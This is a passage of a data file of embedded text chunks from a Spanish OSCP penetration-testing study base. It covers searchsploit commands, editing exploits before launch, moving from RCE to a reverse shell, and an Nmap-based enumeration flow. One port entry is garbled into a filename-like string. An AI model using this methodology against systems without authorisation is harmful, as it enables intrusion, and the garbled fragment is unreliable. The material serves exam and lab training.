-0.03616, 0.15523, -0.12918, 0.04628, 0.02515, -0.01751, 0.08462, 0.00063, 0.04548, -0.10509, 0.09385, 0.04106, 0.00267, -0.02438, 0.00055, 0.00269, -0.02257, -0.07224, 0.05015, -0.00767, 0.00929, 0.05128, 0.05227, -0.06075, -0.01158, -0.01925, -0.02907, -0.12306, -0.0589, -0.04214, 0.06502, -8e-05, 0.0057, 0.08749, -0.06912, 0.08308, -0.02637, 0.02688, -0.02219, 0.03153, 0.01919, 0.01299, 0.16327, -0.02308, 0.06919, -0.0089, -0.01183, 0.00398, -0.00469, -0.06261, 0.03888, 0.03637, 0.01769, -0.02285, -0.00297, 0.07687, 0.03446, -0.04477, 0.03553, 0.06627, 0.04212, -0.00577, -0.04713, -0.03103, -0.04892, -0.02201, 0.04329, -0.06371, -0.0164, -0.00869, 0.00286, 0.01094, -0.00235, -0.04855, 0.00782, -0.03632, 0.04318, 0.04171, 0.04525, -0.04247, 0.03201, -0.07511, 0.07063, -0.03611, -0.04368, -0.01207, 0.02528, -0.03646, -0.00046, 0.0443, -0.02379, 0.04869, 0.05313, -0.02272, 0.02325, 0.05355, -0.01812, 0.03383, -0.0575, -0.0724, -0.05205, -0.03813, -0.01473, 0.02373, -0.01438, -0.03544, -0.06639, -0.0578, 0.09535, -0.05911, 0.01598, 0.01284, 0.02778, -0.09105, 0.01019, 0.06816, -0.01908, -0.0508, 0.07822, -0.03356, 0.00555, -0.01565, 0.12024, 0.00783, -0.00911, 0.03929, 0.03859, -0.00591, 0.03124, -0.02224, 0.0258, -0.0403, -0.02227, -0.05248, -0.04292, -0.07052, 0.01938, 0.00081, -0.02928, 0.01189, -0.07714, 0.07931, 0.01414, -0.02699, 0.04061, -0.05545, -0.05061, -0.04976, 0.02545, -0.02593, 0.01228, -0.02676, -0.00709, 0.07646, 0.00045, 0.04374, -0.03556, 0.03242, 0.05224, -0.02305, -0.01705, -0.03336, 0.03285, 0.03836, -0.02472, -0.02762, -0.01238, -0.04381, -0.04088, -0.00109, -0.03571, -0.03309, 0.03259, 0.01462, -0.03315, -0.01227, -0.05603, -0.04209, 0.01009, 0.01649, 0.01693, -0.04775, -0.03775, -0.09461, -0.03117, -0.01868, 0.01817, 0.01728]} +{"tipo": "metodologia", "herramienta": "searchsploit", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "texto": "## El workflow OSCP\n```\nNmap -sV → identificas servicio + VERSIÓN → searchsploit → explotas\n```\nSustituye a los escáneres de vulns prohibidos (Reglas de herramientas).", "v": [-0.11682, -0.13752, -0.10329, -0.04778, 0.02258, -0.21957, 0.03376, -0.10989, 0.02948, -0.04905, -0.09023, -0.18742, -0.03112, -0.04781, 0.00674, 0.09933, 0.00282, -0.06714, -0.0157, 0.08433, -0.18592, -0.13047, -0.12461, 0.0022, -0.02887, 0.0701, -0.19981, 0.00649, -0.11695, -0.05726, -0.06447, 0.07098, -0.11158, -0.13074, -0.07349, -0.04082, -0.10149, -0.00136, 0.04505, 0.13121, 0.00317, -0.00437, -0.14266, 0.12422, 0.04549, -0.17368, -0.04323, -0.07871, -0.08116, 0.01356, -0.01381, -0.0917, -0.20672, -0.02833, 0.0641, -0.12002, 0.15153, 0.03021, -0.10181, 0.07741, 0.01586, 0.03893, -0.05841, -0.09937, 0.03179, -0.04414, 0.01331, -0.01295, -0.02578, 0.08557, -0.09776, 0.03392, 0.01, -0.03706, 0.10252, -0.0984, -0.07078, -0.0126, 0.12712, 0.05372, 0.00651, 0.00778, -0.0112, 0.09128, -0.03516, -0.01409, 0.05141, -0.00887, -0.01168, -0.0909, 0.06484, 0.06323, 0.0091, -0.03152, 0.07652, -0.0313, 0.04866, 0.09531, -0.03779, 0.06677, 0.03278, 0.00589, -0.05669, 0.03681, -0.03055, 0.01648, -0.05067, 0.02626, 0.06099, -0.0248, 0.11303, 0.01993, 0.08028, -0.03416, 0.04637, -0.00582, -0.04081, -0.00729, 0.07756, -0.01525, -0.01396, -0.05611, 0.09489, -0.02693, 0.02484, -0.02693, -0.04598, 0.07739, 0.03994, -0.01526, -0.01483, 0.06363, -0.02654, -0.00553, 0.01706, -0.06416, -0.01054, -0.04901, 0.04262, -0.06037, 0.04728, 0.012, 0.05823, 0.01146, 0.09444, 0.03223, 0.0491, -0.04827, -0.00205, -0.05251, -0.01593, 0.05323, 0.03041, 0.06959, 0.04786, -0.03177, -0.06819, -0.03056, -0.05007, 0.03467, 0.02427, -0.00263, 0.04648, 0.09876, 0.03986, 0.04289, 0.04, -0.04701, 0.01905, -0.02159, -0.00221, 0.01764, 0.03781, -0.05598, -0.00649, -0.06619, 0.00277, -0.05513, 0.03073, -0.00018, -0.05829, -0.03468, -0.06627, -0.01613, -0.02593, -0.00106, 0.01938, -0.04522, 0.02919, 0.00913, 0.01298, -0.03568, -0.05005, -0.06799, 0.05506, -0.01804, 0.07124, -0.02011, -0.0012, -0.07647, 0.00987, -0.0393, -0.04632, -0.07638, 0.0096, -0.008, 0.00703, 0.03185, -0.06105, -0.03818, 0.02909, -0.03017, 0.06121, 0.005, -0.0731, -0.05776, 0.05648, 0.03623, -0.03325, -0.03658, -0.0189, 0.08626, 0.03461, -0.02306, 0.01722, 0.01568, 0.01751, 0.00206, 0.08837, 0.03029, -0.00102, -0.02757, -0.01507, -0.01398, 0.0684, -0.02518, -0.00721, -0.01208, -0.04502, -0.00929, 0.03136, 0.01021, 0.0055, 0.01295, -0.05835, -0.01145, 0.01867, -0.02608, 0.02994, -0.01315, 0.03654, -0.00705, 0.00548, -0.06894, 0.06146, -0.01544]} +{"tipo": "metodologia", "herramienta": "searchsploit", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "texto": "## Buscar\n```bash\nsearchsploit apache 2.4.49 # servicio + versión EXACTA\nsearchsploit -t wordpress # -t = solo en el título (menos ruido)\nsearchsploit \"vsftpd 2.3.4\"\nsearchsploit --nmap scan.xml # ¡toma un nmap -oX y busca por ti!\n```\n- Quita la versión si no sale nada (a veces el exploit es genérico).\n- Usa términos cortos: `searchsploit drupal` mejor que la cadena entera.", "v": [0.0353, -0.0305, -0.09535, -0.07909, 0.02386, -0.18071, 0.00136, -0.11243, 0.01925, -0.00037, 0.00061, -0.11628, -0.05683, -0.03995, -0.02258, -0.13425, -0.06249, -0.06865, 0.05702, 0.05668, -0.05261, -0.05584, -0.10033, -0.11762, -0.11729, 0.06325, -0.06335, 0.11892, -0.03473, 0.09031, -0.04104, -0.04404, -0.05018, -0.03888, -0.09146, 0.00558, 0.11355, -0.03128, 0.01987, 0.14949, -0.06152, 0.01455, -0.19034, 0.10416, -0.01716, -0.10473, -0.06347, 0.05705, -0.07967, -0.10354, -0.12649, 0.06907, -0.1612, 0.03688, 0.06736, -0.08788, 0.18793, -0.05516, -0.08288, -0.00506, 0.00038, -0.10404, -0.00233, -0.07145, -0.00284, -0.04894, 0.12598, 0.0454, -0.02393, 0.04488, -0.17555, -0.00814, -0.01961, -0.01067, 0.0545, 0.0165, 0.04692, -0.09435, 0.06701, 0.13634, 0.01357, -0.12101, -0.03185, -0.04077, -0.08023, -0.09163, 0.03324, -0.06022, -0.04793, 0.00947, 0.10561, 0.02022, -0.10222, -0.0331, 0.0005, -0.09264, 0.07451, -0.02649, 0.01897, 0.07013, 0.04164, 0.04117, -0.0878, 0.06484, -0.04534, 0.01492, 0.06481, 0.0332, -0.06729, -0.02713, 0.17061, -0.04346, 0.02633, -0.04752, -0.01645, 0.00087, -0.0603, -0.07427, 0.03886, -0.04386, -0.06781, 0.00606, 0.01499, 0.06342, -0.01885, -0.06117, 0.04279, -0.03514, 0.10205, -0.07318, 0.11411, 0.03477, -0.00046, 0.02063, -0.07567, 0.00959, 0.06686, 0.01766, -0.01829, -0.00076, 0.02398, 0.01272, 0.02061, -0.04623, 0.09618, 0.02217, 0.08779, 0.01675, 0.03276, -0.0407, -0.03439, -0.02784, 0.0309, 0.04183, -0.04613, -0.00921, -0.0385, 0.00622, 0.01526, 0.04253, 0.03566, 0.02871, 0.01768, 0.02579, 0.01639, 0.0629, -0.01543, -0.10422, -0.02625, -0.05968, -0.04465, -0.01974, -0.02307, -0.1127, -0.04491, -0.01734, 0.03142, -0.03908, 0.01638, 0.03016, -0.03478, -0.05408, -0.08121, 0.01257, -0.03586, -0.03773, 0.11712, 0.00248, -0.03523, -0.02981, 0.09392, -0.0072, -0.01969, -0.00494, 0.03148, 0.0411, 0.00833, -0.06544, 0.00516, -0.0555, -0.06275, -0.08694, -0.0094, -0.02154, -0.01214, -0.02078, 0.00441, 0.00965, 0.00869, 0.03162, -0.05467, -0.04864, -0.01998, 0.00586, -0.11722, -0.06199, 0.0046, 0.0261, -0.05918, -0.00286, -0.05051, 0.07911, 0.01948, -0.01125, -0.0438, -0.00145, 0.02966, -0.0912, 0.01417, -0.00805, -0.06396, 0.05984, -0.01156, -0.04062, 0.00679, -0.0254, 0.00032, -0.00595, -0.03697, -0.06875, 0.05651, 0.00842, -0.04668, -0.02102, -0.07013, -0.03622, -0.04927, 0.05604, 0.05968, 0.00371, -0.07196, -0.03274, -0.04046, -0.06895, 0.03525, -0.0252]} +{"tipo": "metodologia", "herramienta": "searchsploit", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "texto": "## Examinar y copiar\n```bash\nsearchsploit -x 50383 # ver el exploit (path por EDB-ID)\nsearchsploit -m 50383 # MIRROR: lo copia a tu carpeta actual\nsearchsploit -p 50383 # solo imprime la ruta\nsearchsploit -u # actualizar la base\n```", "v": [-0.08715, -0.07721, -0.10908, -0.18258, 0.15785, -0.21456, 0.06949, 0.03704, -0.05767, -0.02675, 0.02977, -0.12493, 0.06841, -0.07166, -0.0051, -0.15442, -0.04889, -0.00113, -0.08908, -0.06667, 0.07414, 0.07461, -0.08285, -0.0219, -0.09916, 0.13513, -0.12253, 0.12167, -0.07149, 0.06343, -0.02377, 0.08296, -0.05126, 0.05073, -0.13944, -0.06272, 0.0138, -0.00729, -0.06244, 0.05625, 0.04929, 0.04482, -0.18746, 0.12722, 0.07395, -0.1001, 0.02496, -0.03578, -0.04247, -0.07485, -0.16176, -0.00643, -0.10275, 0.02344, -0.02403, -0.11178, 0.1791, 0.02993, -0.03563, 0.0934, -0.0152, -0.03146, -0.07674, -0.01877, 0.07675, 0.003, 0.11046, -0.05909, -0.09999, 0.0423, -0.15462, 0.03046, -0.03879, 0.01065, 0.03097, -0.01342, 0.04428, -0.16446, 0.10635, 0.12241, -0.00163, -0.10851, -0.06008, 0.05535, -0.09657, -0.10324, 0.03812, 0.0013, -0.01399, -0.02636, -0.02927, -0.05016, -0.00933, -0.01032, -0.0207, -0.12272, 0.05171, -0.02122, -0.01309, 0.02217, -0.03946, 0.00845, -0.04452, 0.04392, -0.03312, 0.00511, -0.02284, -0.00745, -0.05696, 0.04015, 0.10476, -0.07425, -0.02196, -0.03213, -0.00617, 0.00354, -0.03505, 0.01257, 0.01192, -0.03838, -0.06485, -0.0151, -0.0223, 0.04916, 0.01421, -0.05552, -0.02234, 0.03281, 0.02175, -0.09017, 0.02671, 0.06227, -0.02884, 0.00997, -0.01762, 0.01536, 0.02179, -0.08485, -0.02254, -0.01815, -0.01194, 0.05964, -0.03147, 0.0041, -0.02542, 0.05261, 0.04647, 0.00408, -0.0678, -0.03463, -0.02919, -0.0164, -0.01409, 0.07107, 0.04501, 0.00755, -0.00404, -0.00574, -0.00263, -0.00087, 0.02954, 0.01918, -0.02991, 0.01875, 0.03902, 0.01659, -0.02027, -0.06116, 0.01164, -0.02358, -0.06176, 0.00123, -0.09192, -0.13642, 0.0399, -0.06033, 0.04566, -0.08229, -0.01064, 0.0441, 0.00914, -0.0384, 0.01932, 0.02232, 0.02759, -0.05342, 0.10224, 0.04269, 0.01019, -0.07815, 0.02698, -0.02822, -0.01432, -0.01695, 0.00542, 0.04537, 0.01993, -0.02111, 0.00951, -0.0133, -0.06692, -0.0357, -0.0608, -0.10949, 0.04435, -0.04816, -0.01992, 0.021, -0.0181, -0.00116, -0.02664, -0.03359, 0.01217, 0.03506, -0.07234, -0.06496, 0.01064, -0.04006, 0.04317, -0.06437, -0.02918, 0.08517, 0.00941, 0.0295, -0.03471, 0.03698, 0.01941, -0.05187, 0.0664, -0.02456, -0.00415, 0.10388, -0.04242, -0.07525, 0.09114, 0.01454, -0.00422, -0.00955, -0.03837, -0.02527, 0.02931, 0.03969, 0.0063, 0.05928, -0.02997, -0.03152, -0.03975, 0.0228, 0.03245, -0.07289, 0.01505, -0.05985, 0.0108, -0.06972, 0.03615, -0.05931]} +{"tipo": "metodologia", "herramienta": "searchsploit", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "texto": "## Antes de lanzar un exploit (¡importante!)\n1. **Léelo entero.** Hay PoCs **maliciosos/falsos** que te hackean a ti.\n2. Edita lo obvio: IP/puerto del atacante, offsets, URL objetivo, shellcode.\n3. Si es C: `gcc exploit.c -o exploit` (a veces flags raras, vienen en el comentario).\n4. Si es Python2 antiguo, ojo con `print`/sockets.", "v": [0.09663, -0.12515, -0.18054, -0.00943, 0.05806, -0.1993, -0.011, -0.02658, -0.07939, 0.05862, 0.02557, -0.10227, -0.05367, 0.01247, -0.02287, -0.00657, -0.04169, 0.01166, 0.04584, -0.08453, -0.12344, 0.12111, -0.05482, -0.16085, 0.03929, 0.15417, -0.03105, 0.15212, -0.09837, -0.0713, -0.01004, 0.07523, 0.03213, -0.01386, -0.0941, -0.10093, 0.02889, -0.00962, 0.08705, 0.19107, 0.04089, -0.02947, -0.21387, 0.04874, 0.02236, -0.12596, 0.04736, -0.00109, 0.02703, -0.00876, 0.06846, -0.07618, -0.17028, 0.02883, 0.03, 0.01236, 0.04059, 0.03714, -0.05816, -0.06998, -0.00171, 0.08624, 0.03395, -0.00898, 0.00997, -0.05305, -0.03123, 0.03809, -0.07719, 0.08616, 0.04918, 0.12086, -0.0271, -0.02437, 0.07461, -0.03504, -0.05546, -0.05311, 0.06381, -0.0095, -0.11254, -0.06283, -0.05255, -0.05449, -0.00053, -0.06216, 0.07046, -0.02233, -0.04818, -0.09852, 0.0988, 0.04662, -0.0553, -0.07625, -0.05658, -0.02055, 0.03008, 0.01154, 0.01155, 0.04306, -0.0045, 0.01454, -0.07092, 0.1441, 0.10193, 0.09002, 0.02897, -0.03661, 0.03822, -0.00136, 0.0439, -0.04306, 0.0045, 0.04167, 0.01352, -0.08117, -0.04301, -0.00785, 0.03165, 0.00867, -0.07143, -0.05089, -0.0472, 0.05801, -0.02782, 0.01129, -0.08279, 0.06781, 0.01481, -0.04594, -0.05966, -0.008, 0.04217, 0.08246, -0.16559, -0.00946, 0.05305, -0.09613, -0.02818, -0.02278, 0.02428, 0.04459, 0.01031, 0.03273, 0.06183, 0.11921, -0.03778, -0.04679, -0.1504, 0.00827, 0.03967, 0.05766, 6e-05, 0.06271, -0.04557, -0.02172, 0.038, -0.05664, 0.00862, 0.03835, -0.02235, 0.03477, 0.05592, -0.00248, -0.05279, -0.02933, -0.02995, -0.09263, 0.05763, 0.0059, -0.01165, 0.02646, -0.00773, -0.07874, 0.01165, -0.06078, 0.0265, 0.00489, -0.0037, 0.00351, -0.03495, -0.03702, -0.05197, 0.03975, -0.02021, -0.03027, 0.10633, 0.01341, 0.06221, 0.02921, 0.12595, 0.00103, 0.04832, 0.05579, 0.00842, 0.00866, 0.00888, -0.0665, 0.04941, -0.03653, -0.00215, 0.02833, 0.02028, -0.0109, 0.01765, 0.05493, -0.03303, -0.05681, -0.08773, 0.02488, 0.05474, -0.06599, 0.06397, -0.05674, -0.05059, -0.00389, 0.00021, 0.05915, 0.01239, 0.03916, -0.06424, 0.08846, 0.07211, -0.00346, 0.00381, 0.00324, 0.02274, -0.01902, 0.05622, 0.03547, -0.08716, 0.06608, -0.02115, -0.03514, -0.01552, -0.01654, 0.02646, -0.01832, -0.05678, -0.10076, -0.00298, 0.01254, -0.00064, -0.02514, -0.00629, -0.05103, -0.04747, 0.01293, -0.00389, -0.02937, -0.06782, 0.03125, -0.0108, -0.0997, 0.03583, -0.02362]} +{"tipo": "metodologia", "herramienta": "searchsploit", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "texto": "## Después\nRCE → Reverse shell. Si es local privesc → mira primero PEASS-ng y Privesc Linux / Privesc Windows (kernel exploit = último recurso).\n\nRelacionado: Exploits conocidos · Nmap NSE · Enumeración · OSCP MOC", "v": [-0.24612, -0.1535, -0.19992, -0.15977, 0.0934, -0.20713, -0.0824, -0.05425, -0.07826, -0.05999, 0.04814, -0.00648, 0.01617, -0.16056, 0.07576, 0.00185, -0.12925, 0.04489, 0.05128, 0.04133, -0.14114, -0.00198, -0.14867, 0.06041, 0.12602, 0.17733, -0.00131, -0.01233, 0.05778, -0.09292, -0.05817, 0.04577, -0.01985, -0.04706, -0.03319, 0.02459, 0.0778, -0.11621, 0.05691, 0.08457, 0.06744, 0.06731, -0.14791, 0.18774, 0.07122, -0.16504, 0.0037, 0.00749, 0.04421, -0.08088, -0.06444, -0.03488, -0.18485, -0.00324, 0.05084, 0.05285, 0.0726, 0.00643, -0.03545, -0.01106, -0.10807, 0.02902, 0.03904, -0.14749, 0.04797, -0.12912, -0.00143, 0.02264, -0.15872, 0.01901, -0.0208, 0.18396, 0.02555, -0.00431, -0.00757, -0.04331, 0.02152, 0.04385, 0.13857, 0.02821, -0.01936, 0.02916, 0.01614, -0.00976, -0.07523, -0.05588, 0.05779, -0.01002, 0.00011, -0.04818, 0.0331, -0.02617, -0.07919, 0.08342, 0.093, -0.07912, -0.024, 0.07595, -0.02799, 0.01903, 0.01191, 0.04824, -0.04744, 0.08104, 0.04279, 0.02048, -0.01049, -0.07042, 0.03982, 0.03467, 0.04717, 0.02537, -0.08174, 0.0243, -0.06368, -0.04408, -0.07133, -0.04377, -0.01826, -0.02008, -0.05287, -0.03569, 0.04637, -0.04581, -0.00522, 0.01607, -0.02665, 0.12816, -0.01289, -0.02535, 0.01308, -0.07137, 0.05625, -0.00483, -0.06626, 0.0012, 0.01873, -0.04691, 0.06001, -0.03157, 0.05291, 0.01414, 0.01401, 0.03786, 0.0651, 0.01577, 0.03786, -0.04752, 0.0023, 0.02132, -0.00738, 0.00583, -0.02677, -0.01042, -0.05473, -0.00931, 0.01669, 0.03002, -0.00684, 0.01004, 0.00727, 0.0091, -0.06881, 0.05155, -0.07786, -0.0262, 0.04599, 0.00723, 0.02422, 0.0029, -0.02487, -0.00176, -0.04563, 0.00965, 0.04059, -0.12772, 0.07854, -0.01997, -0.04406, 0.00278, 0.01431, -0.05015, 0.01133, 0.02734, 0.0145, 0.0127, -0.02517, 0.03659, -0.04628, -0.02433, -0.02221, 0.00203, 0.02749, -0.02879, 0.01598, -0.00984, -0.02019, -0.04442, -0.01558, -0.01783, -0.04594, -0.01015, -0.0611, -0.01762, 0.02455, 0.0165, -0.00701, -0.03296, -0.02615, 0.00319, -0.00976, 0.03995, 0.0325, -0.00633, 0.01428, 0.00074, 0.03068, 0.04791, -0.01026, 0.01322, -0.00214, 0.06166, 0.05561, -0.00013, 0.01133, -0.03333, -0.0154, -0.01199, -0.02664, -0.03106, 0.03411, 0.02591, 0.02439, -0.01797, 0.02667, 0.01372, -0.01477, 0.02103, 0.01893, -0.01451, 0.00052, 0.03047, 0.00907, -0.06238, -0.04055, -0.05064, 0.00245, -0.03653, -0.0019, -0.03026, -0.00138, -0.04908, -0.0068, -0.08401, -0.04253, 0.02954]} +{"tipo": "metodologia", "herramienta": "Enumeración", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración.md", "texto": "# Enumeración (índice)\n\n> \"Enumeración exhaustiva\" es el paso 1 de la Metodología OSCP y donde más gente pierde horas.\n> La mayoría de los fallos del examen son enumeración incompleta, no falta de técnica.", "v": [-0.05694, 0.02385, -0.15006, -0.0166, -0.02412, -0.03837, -0.00136, 0.06609, -0.15254, -0.02624, -0.17812, 0.05658, 0.03052, 0.04802, 0.0417, 0.04514, 0.08873, -0.11802, 0.02597, -0.06591, -0.18531, -0.08775, -0.05997, 0.06377, -0.01289, 0.04853, -0.18732, -0.0284, -0.01782, -0.09271, -0.02972, 0.06278, 0.06263, -0.15835, -0.03687, -0.00328, -0.05305, -0.0633, -0.11245, 0.11939, 0.00017, 0.14573, -0.09092, -0.04098, 0.00742, -0.10011, -0.02938, 0.21684, 0.03301, -0.08017, -0.11483, -0.0581, 0.00908, -0.05877, -0.11692, -0.10868, 0.02538, 0.07823, 0.01774, -0.08679, 0.06438, 0.03892, 0.04395, -0.02823, 0.07651, -0.01896, -0.05871, -0.00448, -0.0135, 0.09025, -0.02381, 0.03978, -0.09131, -0.0271, 0.04187, 0.01448, -0.05124, 0.06661, 0.09149, 0.00052, 0.009, -0.12155, -0.0703, -0.03997, -0.11979, -0.06905, 0.11975, -0.02588, -0.04377, -0.10836, -0.03482, 0.01706, 0.05768, -0.06997, 0.00894, -4e-05, 0.0678, 0.03968, 0.05196, 0.01433, 0.09434, -0.00249, -0.03399, 0.01443, 0.02024, 0.13505, 0.11215, -0.00557, 0.00794, -0.03373, -0.03751, 0.10857, -0.01946, -0.08753, -0.1626, -0.0656, -0.01446, 0.01128, -0.03014, 0.01265, 0.0261, -0.02895, -0.00653, -0.04863, 0.00109, -0.11189, 0.02174, 0.04424, 0.12645, -0.01915, -0.00089, 0.00494, -0.08169, -0.06532, -0.04629, -0.04585, 0.0146, 0.03683, 0.06134, 0.00412, 0.01221, 0.05335, -0.01541, -0.01752, -0.01192, -0.03683, 0.01917, -0.12834, -0.11658, -0.06654, -0.06135, 0.04421, 0.03933, 0.08953, -0.0174, -0.04748, 0.02808, -0.06524, 0.05716, 0.03129, 0.01278, 0.01285, 0.00455, 0.04807, -0.0052, -0.01681, 0.02111, -0.02327, -0.02201, -0.02904, -0.02351, 0.04238, -0.10397, -0.09095, 0.01257, -0.0045, 0.00136, -0.04094, 0.04562, 0.0117, -0.06998, -0.05578, 0.01018, 0.0043, 0.07786, -0.01058, -0.03441, -0.01306, 0.03861, -0.02286, 0.03878, -0.06257, -0.0508, -0.0096, -0.02188, 0.00262, 0.02139, -0.01979, 0.04286, -0.02041, -0.03287, 0.0118, -0.0271, 0.01102, 0.07903, 0.04727, 0.01561, 0.03115, -0.02557, -0.00599, 0.0009, 0.00612, 0.02129, -0.06277, -0.01472, -0.04675, 0.04016, 0.0376, -0.08595, 0.04591, 0.06061, 0.02835, 0.02516, 0.00334, -0.04626, 6e-05, 0.0638, 0.0356, 0.02377, 0.0602, 0.03914, -0.05031, 0.03869, -0.02432, 0.0983, 0.04413, 0.06444, 0.00884, -0.03503, -0.06695, 0.04216, 0.07435, -0.01303, -0.03099, -0.03608, -0.0609, -0.06208, -0.02417, 0.06688, -0.09626, -0.0117, -0.02267, -0.03535, -0.03746, 0.08052, -0.10773]} +{"tipo": "metodologia", "herramienta": "Enumeración", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración.md", "texto": "## Flujo\n1. **Mi IP / red** → `ip a | grep \"inet \"` (el 3er octeto del lab **cambia** al reiniciar).\n2. **Descubrimiento de hosts** → ping/ARP sweep (Nmap).\n3. **Escaneo de puertos** → top-1000 **y** `-p-` completo (Puertos olvidados).\n4. **Por servicio**:\n - 445 → SMB\n - UDP 161 → SNMP\n - 80/443 → Enumeración web + Content discovery + Hacking web\n - 3389 → RDP\n - texto plano (!OS-57179836-OSCP.ovpn25, 110...) → Netcat\n1. **Scripts NSE** → Nmap NSE (`-sCV`, `--script vuln`).\n2. **Versión + exploits** → `nmap -sV` → searchsploit.", "v": [-0.02105, -0.2121, -0.07649, -0.13079, 0.04113, -0.15749, -0.05199, -0.08158, -0.0411, 0.02927, -0.02226, -0.16902, 0.07165, -0.15583, -0.17073, 0.02361, -0.10294, -0.07767, 0.06824, 0.10213, -0.14162, 0.11191, -0.08755, -0.08606, 0.03956, 0.18521, -0.13525, 0.14358, -0.06451, -0.04186, -0.05251, -0.00726, -0.07937, -0.03346, -0.05361, -0.06383, 0.0794, -0.06953, 0.09072, 0.1048, 0.05368, 0.10939, -0.08223, 0.11368, 0.05964, -0.08549, 0.06125, -0.01225, -0.00015, -0.08157, -0.00326, -0.02751, -0.11171, -0.01418, -0.07636, 0.10521, 0.11756, 0.02566, -0.05948, -0.01243, 0.0906, 0.0375, -0.0631, -0.18339, 0.02551, -0.0947, 0.02381, 0.0275, -0.08464, 0.10056, 0.01621, 0.04555, -0.0239, -0.03776, 0.0669, -0.06903, 0.04411, -0.07203, 0.12285, 0.07664, 0.00432, -0.01345, -0.14428, -0.07227, -0.05174, -0.06473, 0.08451, -0.08565, -0.02837, -0.08374, 0.10692, 0.03147, 0.03975, 0.08279, -0.02602, -0.12834, 0.04159, 0.0446, 0.0352, 0.01326, 0.04625, 0.12747, -0.13066, 0.02841, 0.03662, 0.063, 0.04699, 0.02773, 0.05607, 0.02231, 0.05563, 0.03118, 0.01197, -0.00985, 0.00198, -0.02774, 0.02948, 0.02815, 0.06565, -0.0735, -0.0151, -0.008, 0.00508, 0.04004, -0.0333, 0.0155, 0.02398, 0.02332, 0.11353, -0.0084, 0.0165, -0.00083, -0.0476, -0.03675, -0.0306, -0.04393, 0.03855, 0.00347, 0.02239, 0.04138, 0.01914, 0.01842, 0.01111, 0.01955, 0.05126, 0.03319, 0.07779, -0.01555, -0.03092, 0.0594, 0.03109, 0.04737, -0.03853, 0.01354, 0.03672, -0.02412, -0.01348, -0.07711, -0.08435, 0.03324, -0.00867, 0.02102, 0.08085, 0.05939, 0.01452, 0.03698, -0.00745, 0.00728, -0.02095, -0.06688, -0.00771, -0.02443, -0.05288, -0.07371, -0.03975, -0.08052, 0.01266, -0.02957, -0.02812, 0.00929, -0.01518, -0.05758, 0.01228, 0.00919, -0.04021, -0.01566, 0.05073, -0.01837, -0.00079, -0.03741, 0.0263, -0.01446, -0.00879, 0.00587, 0.04441, -0.03111, 0.02502, -0.10591, 0.00707, -0.04203, -0.05668, -0.00561, -0.02915, -0.03446, -0.0688, -0.0497, 0.01244, -0.02595, -0.0626, -0.00946, 0.01606, -0.02088, 0.03226, -0.01983, -0.05293, -0.03167, 0.01486, 0.10274, 0.02877, -0.00247, 0.01513, 0.06761, -0.04194, 0.04326, -0.00056, -0.03515, 0.04317, -0.05258, 0.0087, -0.00555, -0.00692, 0.02409, 0.05879, -0.05741, -0.03617, -0.02974, 0.00106, 0.00469, -0.02255, -0.01615, -0.03458, 0.02102, -0.02001, -0.04398, -0.02904, -0.06106, -0.01423, -0.00248, -0.03174, 0.0134, 0.00451, -0.06391, -0.0521, -0.07778, 0.04276, 0.00968]} +{"tipo": "metodologia", "herramienta": "Enumeración", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración.md", "texto": "## No olvides\n- Trampas de enumeración (UDP, puertos altos, vhosts, wordlists pequeñas).\n- Automatiza con Bucles bash sobre IPs.\n- La web es su propio mundo → Hacking web.\n\nRelacionado: Operadores Bash · OSCP MOC", "v": [-0.02779, -0.17253, 0.00665, -0.1476, -0.03561, -0.096, 0.06663, -0.07007, -0.09493, 0.11196, -0.06407, -0.05228, 0.02463, 0.08542, -0.06615, -0.05859, 0.03414, -0.00921, 0.0437, -0.11698, -0.01085, 0.07023, -0.22198, 0.15683, 0.04513, -0.05321, -0.10255, 0.019, -0.19178, -0.03671, -0.10785, -0.03389, -0.06573, 0.04352, -0.0472, -0.04997, -0.1001, -0.07486, 0.15309, 0.15719, 0.01882, 0.147, -0.06472, 0.10689, 0.14694, -0.04792, 0.06112, -0.04929, 0.11235, -0.14144, -0.08865, -0.10209, -0.17925, -0.01792, -0.05983, -0.00114, 0.12135, 0.00463, -0.04836, -0.03134, -0.06257, 0.12407, -0.0598, -0.053, -0.00225, -0.04452, -0.12632, -0.03447, 0.01452, 0.09748, 0.05494, 0.04274, 0.05225, 0.09724, 0.11788, -0.02754, 0.07282, -0.0638, 0.10806, 0.05277, -0.07072, -0.03553, 0.00126, 0.09666, -0.02853, -0.07768, 0.01012, -0.04771, -0.00941, 0.00455, 0.15723, 0.05057, 0.0098, 0.01078, 0.08204, -0.1628, 0.02016, 0.02189, -0.03519, -0.02176, -0.02521, 0.04895, -0.06537, 0.09128, -0.00511, 0.07156, 0.15655, 0.03468, 0.05744, 0.01151, 0.04738, -0.04028, 0.00178, -0.07163, -0.04087, -0.05324, -0.02413, -0.04232, 0.02655, -0.06729, -0.04705, -0.01389, 0.04821, 0.00998, -0.03017, 0.04854, -0.02074, 0.09381, 0.04471, -0.05361, 0.06813, -0.04064, -0.03894, -0.07444, -0.00401, 0.02347, -0.01209, -0.04707, 0.06659, -0.03409, -0.03405, 0.0473, -0.04723, 0.00544, 0.06517, -0.00783, 0.01285, 0.00801, 0.02332, 0.00247, 0.05396, 0.03717, -0.00555, -0.03769, 0.0257, -0.03264, 0.00807, -0.07668, -0.04046, 0.03186, 0.0165, -0.01471, 0.00271, -0.01737, 0.00647, 0.0558, -0.03957, 0.0852, -0.06121, -0.03139, -0.03172, 0.02506, -0.10084, -0.0251, -0.04396, -0.0078, -0.00903, -0.01823, -0.05061, -0.00847, 0.00756, -0.02276, -0.00111, 0.01807, -0.04844, -0.0178, 0.10622, 0.0191, -0.0462, 0.05122, -0.01609, 0.00038, -0.03084, 0.07542, 0.0183, 0.03914, -0.00174, -0.09115, -0.02925, 0.00601, -0.01256, -0.03909, 0.04295, -0.00557, 